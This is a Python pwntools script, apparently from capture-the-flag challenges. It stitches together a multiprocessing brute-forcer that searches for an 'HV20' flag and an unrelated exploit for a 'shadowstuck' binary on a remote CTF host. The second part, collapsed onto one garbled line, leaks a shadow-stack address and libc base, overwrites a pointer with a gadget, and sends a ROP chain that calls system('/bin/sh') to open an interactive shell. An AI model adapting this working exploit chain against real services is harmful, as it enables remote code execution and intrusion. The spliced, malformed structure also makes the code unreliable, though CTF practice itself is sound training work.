# NOTE(review): the statements up to the `count % 100` check are the tail of a
# brute-force worker (presumably `brute_force_range`) whose `def` and loop
# header sit outside this view. The block structure below was reconstructed
# from a single collapsed line — confirm the indentation against the original
# file, in particular which writes sit inside the `startswith("H")` branch.
p.sendline(str(input))
# recvall() reads until the peer closes, so `p` is presumably re-created per
# candidate further up in the loop — verify.
output = p.recvall().decode('ascii')
# Expects the reply to contain "Unlocked secret is:"; a reply without it
# makes the [1] index raise IndexError and takes the worker down.
flag = output.split('Unlocked secret is:')[1].strip()
if not flag.startswith("H"):
    output_file.write(f"Error: Invalid flag {flag} for input {input}\n")
# Every candidate/result pair is logged, valid or not, so a run can be resumed
# or audited from output_file.
output_file.write(f"{flag} for {input}\n")
if "HV20" in flag:
    # `pid` is the worker's label ("1".."4" below), not an OS pid.
    print(flag + " " + pid)
    exit(0)
count += 1
if count % 100 == 0:
    print(f"HV PID {pid} has {count}/{len(search)}")

# Candidate offsets: every occurrence of `assembly_for_h` in the binary,
# materialised so it can be split and so len(search) works in the progress line.
search = list(elf.search(assembly_for_h))
# array_split tolerates a length that is not a multiple of 4 (array_split,
# not split), so the four slices may differ in size by one.
a, b, c, d = array_split(search, 4)
# NOTE(review): lambda targets are only usable with the "fork" start method
# (the default on Linux); under "spawn" (macOS/Windows) Process cannot pickle
# them — pass `target=brute_force_range, args=(a, "1")` instead if that matters.
p1 = Process(target=lambda: brute_force_range(a, "1"))
p2 = Process(target=lambda: brute_force_range(b, "2"))
p3 = Process(target=lambda: brute_force_range(c, "3"))
p4 = Process(target=lambda: brute_force_range(d, "4"))
p1.start()
p2.start()
p3.start()
p4.start()
p = remote("challenges.ctf.kaf.sh", 8000) #p = process('./shadowstuck', env={"LD_PRELOAD":"./libc-2.31.so"}) libc = ELF('./libc-2.31.so') base_shadowstack = int(p.recvline().split(b'at ')[1][:-1], 16) print("[+] Shadowstack @ 0x%x" % base_shadowstack) add_employee("Mike") #0 fire_employee("Mike", b'a' * 0x10 + pack(base_shadowstack)[:-2]) leak = unpack(read_employee(1).ljust(8, b'\x00')) print("[+] Leak libc @ 0x%x" % leak) libc.address = leak - 159923 print("[+] Libc @ 0x%x" % libc.address) pop_rdi_gadget = libc.address + 0x26b72 change_employee(1, pack(pop_rdi_gadget).rstrip(b'\x00')) assert unpack(read_employee(1).ljust(8, b'\x00')) == pop_rdi_gadget rop = b"aaaaaaaaaaaaaaaaaaaaaaaaa" #padding rop += pack(pop_rdi_gadget) rop += pack(next(libc.search(b'/bin/sh'))) rop += pack(pop_rdi_gadget + 1) #for stack alignment rop += pack(libc.symbols['system']) employee_exit(rop) p.interactive()